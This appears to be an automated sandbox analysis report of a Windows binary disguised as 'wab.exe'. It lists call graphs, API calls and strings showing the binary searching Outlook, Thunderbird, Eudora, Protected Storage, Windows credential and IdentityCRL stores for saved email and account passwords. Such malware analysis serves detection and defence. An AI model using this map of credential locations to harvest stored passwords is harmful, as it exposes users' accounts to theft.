4023e5 16 API calls 33585->33749 33586->33585 33589 44b090 33588->33589 33590 40fb10 RegOpenKeyExA 33589->33590 33591 403e7f 33590->33591 33592 40fb3b RegOpenKeyExA 33590->33592 33602 40f96c 33591->33602 33593 40fb55 RegQueryValueExA 33592->33593 33594 40fc2d RegCloseKey 33592->33594 33595 40fc23 RegCloseKey 33593->33595 33596 40fb84 33593->33596 33594->33591 33595->33594 33597 404734 3 API calls 33596->33597 33598 40fb91 33597->33598 33598->33595 33599 40fc19 LocalFree 33598->33599 33600 40fbdd memcpy memcpy 33598->33600 33599->33595 33754 40f802 11 API calls 33600->33754 33603 4070ae GetVersionExA 33602->33603 33604 40f98d 33603->33604 33605 4045db 7 API calls 33604->33605 33606 40f9a9 33605->33606 33607 40fae6 33606->33607 33608 40f9bf CredEnumerateW 33606->33608 33615 40f9d1 33606->33615 33609 404656 FreeLibrary 33607->33609 33608->33615 33610 403e85 33609->33610 33616 4442ea memset 33610->33616 33611 40fa13 memset WideCharToMultiByte 33612 40fa43 _strnicmp 33611->33612 33611->33615 33613 40fa5b WideCharToMultiByte 33612->33613 33612->33615 33614 40fa88 WideCharToMultiByte 33613->33614 33613->33615 33614->33615 33615->33607 33615->33611 33617 410dbb 9 API calls 33616->33617 33618 444329 33617->33618 33755 40759e strlen strlen 33618->33755 33623 410dbb 9 API calls 33624 444350 33623->33624 33625 40759e 3 API calls 33624->33625 33626 44435a 33625->33626 33627 444212 65 API calls 33626->33627 33628 444366 memset memset 33627->33628 33629 410b1e 3 API calls 33628->33629 33630 4443b9 ExpandEnvironmentStringsA strlen 33629->33630 33631 4443f4 _strcmpi 33630->33631 33632 4443e5 33630->33632 33633 403e91 33631->33633 33634 44440c 33631->33634 33632->33631 33633->33210 33635 444212 65 API calls 33634->33635 33635->33633 33636->33384 33637->33388 33638->33396 33639->33400 33640->33404 33641->33422 33642->33424 33643->33445 33644->33449 33645->33442 33647 40841c 33646->33647 33648 410a9c RegOpenKeyExA 33647->33648 33648->33458 33649->33464 33650->33464 33651->33468 33652->33470 33653->33464 33654->33473 33655->33479 33656->33479 33657->33482 33658->33479 33660 404656 FreeLibrary 33659->33660 33661 4045e3 LoadLibraryA 33660->33661 33662 404651 33661->33662 33663 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33661->33663 33662->33485 33662->33489 33664 40463d 33663->33664 33665 404656 FreeLibrary 33664->33665 33666 404643 33664->33666 33665->33662 33666->33662 33668 403cd2 33667->33668 33669 40465c FreeLibrary 33667->33669 33668->33498 33669->33668 33670->33492 33671->33502 33672->33516 33673->33510 33674->33511 33675->33516 33676->33516 33677->33516 33678->33527 33679->33535 33680->33535 33681->33535 33682->33535 33683->33545 33684->33547 33685->33548 33686->33552 33687->33553 33688->33553 33689->33562 33690->33559 33691->33568 33730 4078ba 33692->33730 33695 4078ba _mbsnbcat 33696 40f5a3 RegOpenKeyExA 33695->33696 33697 40f5c3 RegQueryValueExA 33696->33697 33698 40f6d9 33696->33698 33699 40f6d0 RegCloseKey 33697->33699 33700 40f5f0 33697->33700 33698->33568 33699->33698 33700->33699 33710 40f675 33700->33710 33734 40466b _mbscpy 33700->33734 33702 40f611 33704 404734 3 API calls 33702->33704 33709 40f616 33704->33709 33705 40f69e RegQueryValueExA 33705->33699 33706 40f6c1 33705->33706 33706->33699 33707 40f66a 33708 404785 FreeLibrary 33707->33708 33708->33710 33709->33707 33711 40f661 LocalFree 33709->33711 33712 40f645 memcpy 33709->33712 33710->33699 33735 4012ee strlen 33710->33735 33711->33707 33712->33711 33736 40466b _mbscpy 33713->33736 33715 40f6fa 33716 4045db 7 API calls 33715->33716 33717 40f708 33716->33717 33718 404734 3 API calls 33717->33718 33724 40f7e2 33717->33724 33720 40f715 33718->33720 33719 404656 FreeLibrary 33721 40f7f1 33719->33721 33720->33724 33725 40f797 WideCharToMultiByte 33720->33725 33722 404785 FreeLibrary 33721->33722 33723 40f7fc 33722->33723 33723->33568 33724->33719 33726 40f7b8 strlen 33725->33726 33727 40f7d9 LocalFree 33725->33727 33726->33727 33728 40f7c8 _mbscpy 33726->33728 33727->33724 33728->33727 33729->33568 33731 4078e6 33730->33731 33732 4078c7 _mbsnbcat 33731->33732 33733 4078ea 33731->33733 33732->33731 33733->33695 33734->33702 33735->33705 33736->33715 33750 410a9c RegOpenKeyExA 33737->33750 33739 40381a 33739->33576 33748 4021b6 memset 33739->33748 33740 44458b 33740->33739 33751 410add RegQueryValueExA 33740->33751 33742 4445a4 33743 4445dc RegCloseKey 33742->33743 33752 410add RegQueryValueExA 33742->33752 33743->33739 33745 4445c1 33745->33743 33753 444879 30 API calls 33745->33753 33747 4445da 33747->33743 33748->33578 33749->33576 33750->33740 33751->33742 33752->33745 33753->33747 33754->33599 33756 4075c9 33755->33756 33757 4075bb _mbscat 33755->33757 33758 444212 33756->33758 33757->33756 33775 407e9d 33758->33775 33761 44424d 33762 444274 33761->33762 33764 444258 33761->33764 33783 407ef8 33761->33783 33763 407e9d 9 API calls 33762->33763 33772 4442a0 33763->33772 33800 444196 52 API calls 33764->33800 33766 407ef8 9 API calls 33766->33772 33767 4442ce 33797 407f90 33767->33797 33771 407f90 FindClose 33773 4442e4 33771->33773 33772->33766 33772->33767 33774 444212 65 API calls 33772->33774 33793 407e62 33772->33793 33773->33623 33774->33772 33776 407f90 FindClose 33775->33776 33777 407eaa 33776->33777 33778 406f06 2 API calls 33777->33778 33779 407ebd strlen strlen 33778->33779 33780 407ee1 33779->33780 33781 407eea 33779->33781 33801 4070e3 strlen _mbscat _mbscpy _mbscat 33780->33801 33781->33761 33784 407f03 FindFirstFileA 33783->33784 33785 407f24 FindNextFileA 33783->33785 33786 407f3f 33784->33786 33787 407f46 strlen strlen 33785->33787 33788 407f3a 33785->33788 33786->33787 33789 407f7f 33786->33789 33787->33789 33790 407f76 33787->33790 33791 407f90 FindClose 33788->33791 33789->33761 33802 4070e3 strlen _mbscat _mbscpy _mbscat 33790->33802 33791->33786 33794 407e94 33793->33794 33795 407e6c strcmp 33793->33795 33794->33772 33795->33794 33796 407e83 strcmp 33795->33796 33796->33794 33798 407fa3 33797->33798 33799 407f99 FindClose 33797->33799 33798->33771 33799->33798 33800->33761 33801->33781 33802->33789 33803->33223 33804->33227 33805->33234 33806->33233 33807->33240 33808->33237 33809->33232 33818 411853 RtlInitializeCriticalSection memset 33819 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33992 40a256 13 API calls 33994 432e5b 17 API calls 33996 43fa5a 20 API calls 33821 401060 41 API calls 33999 427260 CloseHandle memset memset 32915 410c68 FindResourceA 32916 410c81 SizeofResource 32915->32916 32919 410cae 32915->32919 32917 410c92 LoadResource 32916->32917 32916->32919 32918 410ca0 LockResource 32917->32918 32917->32919 32918->32919 34001 405e69 14 API calls 33826 433068 15 API calls __fprintf_l 34003 414a6d 18 API calls 34004 43fe6f 134 API calls 33828 424c6d 15 API calls __fprintf_l 34005 426741 19 API calls 33830 440c70 17 API calls 33831 443c71 44 API calls 33834 427c79 24 API calls 34008 416e7e memset __fprintf_l 33838 42800b 47 API calls 33839 425115 82 API calls __fprintf_l 34011 41960c 61 API calls 33840 43f40c 122 API calls __fprintf_l 33843 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33844 43f81a 20 API calls 33846 414c20 memset memset 33847 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34015 414625 18 API calls 34016 404225 modf 34017 403a26 strlen WriteFile 34019 40422a 12 API calls 34023 427632 memset memset memcpy 34024 40ca30 59 API calls 32902 44b435 VirtualProtect 32903 44b444 VirtualProtect 32902->32903 32904 44b454 32902->32904 32903->32904 34025 404235 26 API calls 33849 425115 76 API calls __fprintf_l 34026 425115 77 API calls __fprintf_l 34028 44223a 38 API calls 33855 43183c 112 API calls 34029 44b2c5 _onexit __dllonexit 34034 42a6d2 memcpy __allrem 33857 405cda 65 API calls 34042 43fedc 138 API calls 34043 4116e1 16 API calls __fprintf_l 33860 4244e6 19 API calls 33862 42e8e8 127 API calls __fprintf_l 33863 4118ee RtlLeaveCriticalSection 34048 43f6ec 22 API calls 33865 425115 119 API calls __fprintf_l 32905 410cf3 EnumResourceNamesA 34051 4492f0 memcpy memcpy 34053 43fafa 18 API calls 34055 4342f9 15 API calls __fprintf_l 33866 4144fd 19 API calls 34057 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34058 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34061 443a84 _mbscpy 34063 43f681 17 API calls 33869 404487 22 API calls 34065 415e8c 16 API calls __fprintf_l 33873 411893 RtlDeleteCriticalSection __fprintf_l 33874 41a492 42 API calls 34069 403e96 34 API calls 34070 410e98 memset SHGetPathFromIDList SendMessageA 33876 426741 109 API calls __fprintf_l 33877 4344a2 18 API calls 33878 4094a2 10 API calls 34073 4116a6 15 API calls __fprintf_l 34074 43f6a4 17 API calls 34075 440aa3 20 API calls 34077 427430 45 API calls 33881 4090b0 7 API calls 33882 4148b0 15 API calls 33884 4118b4 RtlEnterCriticalSection 33885 4014b7 CreateWindowExA 33886 40c8b8 19 API calls 33888 4118bf RtlTryEnterCriticalSection 34082 42434a 18 API calls __fprintf_l 34084 405f53 12 API calls 33896 43f956 59 API calls 33898 40955a 17 API calls 33899 428561 36 API calls 33900 409164 7 API calls 34088 404366 19 API calls 34092 40176c ExitProcess 34095 410777 42 API calls 33905 40dd7b 51 API calls 33906 425d7c 16 API calls __fprintf_l 34097 43f6f0 25 API calls 34098 42db01 22 API calls 33907 412905 15 API calls __fprintf_l 34099 403b04 54 API calls 34100 405f04 SetDlgItemTextA GetDlgItemTextA 34101 44b301 ??3@YAXPAX 34104 4120ea 14 API calls 3 library calls 34105 40bb0a 8 API calls 34107 413f11 strcmp 33911 434110 17 API calls __fprintf_l 33913 425115 108 API calls __fprintf_l 34108 444b11 _onexit 33915 425115 76 API calls __fprintf_l 33918 429d19 10 API calls 34111 444b1f __dllonexit 34112 409f20 _strcmpi 33920 42b927 31 API calls 34115 433f26 19 API calls __fprintf_l 34116 44b323 FreeLibrary 34117 427f25 46 API calls 34118 43ff2b 17 API calls 34119 43fb30 19 API calls 33927 414d36 16 API calls 33929 40ad38 7 API calls 34121 433b38 16 API calls __fprintf_l 34122 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 33933 426741 21 API calls 33934 40c5c3 125 API calls 33936 43fdc5 17 API calls 34123 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33939 4161cb memcpy memcpy memcpy memcpy 34128 43ffc8 18 API calls 33940 4281cc 15 API calls __fprintf_l 34130 4383cc 110 API calls __fprintf_l 33941 4275d3 41 API calls 34131 4153d3 22 API calls __fprintf_l 33942 444dd7 _XcptFilter 34136 4013de 15 API calls 34138 425115 111 API calls __fprintf_l 34139 43f7db 18 API calls 34142 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33945 4335ee 16 API calls __fprintf_l 34144 429fef 11 API calls 33946 444deb _exit _c_exit 34145 40bbf0 138 API calls 33949 425115 79 API calls __fprintf_l 34149 437ffa 22 API calls 33953 4021ff 14 API calls 33954 43f5fc 149 API calls 34150 40e381 9 API calls 33956 405983 40 API calls 33957 42b186 27 API calls __fprintf_l 33958 427d86 76 API calls 33959 403585 20 API calls 33961 42e58e 18 API calls __fprintf_l 33964 425115 75 API calls __fprintf_l 33966 401592 8 API calls 32906 410b92 32909 410a6b 32906->32909 32908 410bb2 32910 410a77 32909->32910 32911 410a89 GetPrivateProfileIntA 32909->32911 32914 410983 memset _itoa WritePrivateProfileStringA 32910->32914 32911->32908 32913 410a84 32913->32908 32914->32913 34154 434395 16 API calls 33968 441d9c memcmp 34156 43f79b 119 API calls 33969 40c599 43 API calls 34157 426741 87 API calls 33973 4401a6 21 API calls 33975 426da6 memcpy memset memset memcpy 33976 4335a5 15 API calls 33978 4299ab memset memset memcpy memset memset 33979 40b1ab 8 API calls 34162 425115 76 API calls __fprintf_l 34166 4113b2 18 API calls 2 library calls 34170 40a3b8 memset sprintf SendMessageA 32920 410bbc 32923 4109cf 32920->32923 32924 4109dc 32923->32924 32925 410a23 memset GetPrivateProfileStringA 32924->32925 32926 4109ea memset 32924->32926 32931 407646 strlen 32925->32931 32936 4075cd sprintf memcpy 32926->32936 32929 410a0c WritePrivateProfileStringA 32930 410a65 32929->32930 32932 40765a 32931->32932 32934 40765c 32931->32934 32932->32930 32933 4076a3 32933->32930 32934->32933 32937 40737c strtoul 32934->32937 32936->32929 32937->32934 33981 40b5bf memset memset _mbsicmp

                    Executed Functions

                    Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                    APIs
                    • memset.MSVCRT ref: 0040832F
                    • memset.MSVCRT ref: 00408343
                    • memset.MSVCRT ref: 0040835F
                    • memset.MSVCRT ref: 00408376
                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                    • strlen.MSVCRT ref: 004083E9
                    • strlen.MSVCRT ref: 004083F8
                    • memcpy.MSVCRT ref: 0040840A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                    • String ID: 5$H$O$b$i$}$}
                    • API String ID: 1832431107-3760989150
                    • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                    • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                    Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 461 407ef8-407f01 462 407f03-407f22 FindFirstFileA 461->462 463 407f24-407f38 FindNextFileA 461->463 464 407f3f-407f44 462->464 465 407f46-407f74 strlen * 2 463->465 466 407f3a call 407f90 463->466 464->465 467 407f89-407f8f 464->467 468 407f83 465->468 469 407f76-407f81 call 4070e3 465->469 466->464 472 407f86-407f88 468->472 469->472 472->467
                    APIs
                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                    • strlen.MSVCRT ref: 00407F5C
                    • strlen.MSVCRT ref: 00407F64
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFindstrlen$FirstNext
                    • String ID: ACD
                    • API String ID: 379999529-620537770
                    • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                    • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                    Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 00401E8B
                    • strlen.MSVCRT ref: 00401EA4
                    • strlen.MSVCRT ref: 00401EB2
                    • strlen.MSVCRT ref: 00401EF8
                    • strlen.MSVCRT ref: 00401F06
                    • memset.MSVCRT ref: 00401FB1
                    • atoi.MSVCRT ref: 00401FE0
                    • memset.MSVCRT ref: 00402003
                    • sprintf.MSVCRT ref: 00402030
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • memset.MSVCRT ref: 00402086
                    • memset.MSVCRT ref: 0040209B
                    • strlen.MSVCRT ref: 004020A1
                    • strlen.MSVCRT ref: 004020AF
                    • strlen.MSVCRT ref: 004020E2
                    • strlen.MSVCRT ref: 004020F0
                    • memset.MSVCRT ref: 00402018
                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                    • _mbscpy.MSVCRT ref: 00402177
                    • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                    • API String ID: 1846531875-4223776976
                    • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                    • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                    Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                    • DeleteObject.GDI32(?), ref: 0040D1A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                    • API String ID: 745651260-375988210
                    • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                    • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                    Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                    • _mbscpy.MSVCRT ref: 00403E54
                    Strings
                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                    • pstorec.dll, xrefs: 00403C30
                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                    • PStoreCreateInstance, xrefs: 00403C44
                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadProc_mbscpy
                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                    • API String ID: 1197458902-317895162
                    • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                    • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                    Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • memcpy.MSVCRT ref: 0040FBE4
                    • memcpy.MSVCRT ref: 0040FBF9
                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                    • API String ID: 2768085393-2409096184
                    • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                    • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                    Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 254 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->254 253->252 255 444c75-444c7e 253->255 264 444d02-444d0d __setusermatherr 254->264 265 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 254->265 257 444c80-444c85 255->257 258 444c9f-444ca3 255->258 257->252 259 444c8c-444c93 257->259 258->252 260 444ca5-444ca7 258->260 259->252 262 444c95-444c9d 259->262 263 444cad-444cb0 260->263 262->263 263->254 264->265 268 444da4-444da7 265->268 269 444d6a-444d72 265->269 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                    • String ID:
                    • API String ID: 3662548030-0
                    • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                    • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                    Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0044430B
                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                    • memset.MSVCRT ref: 00444379
                    • memset.MSVCRT ref: 00444394
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
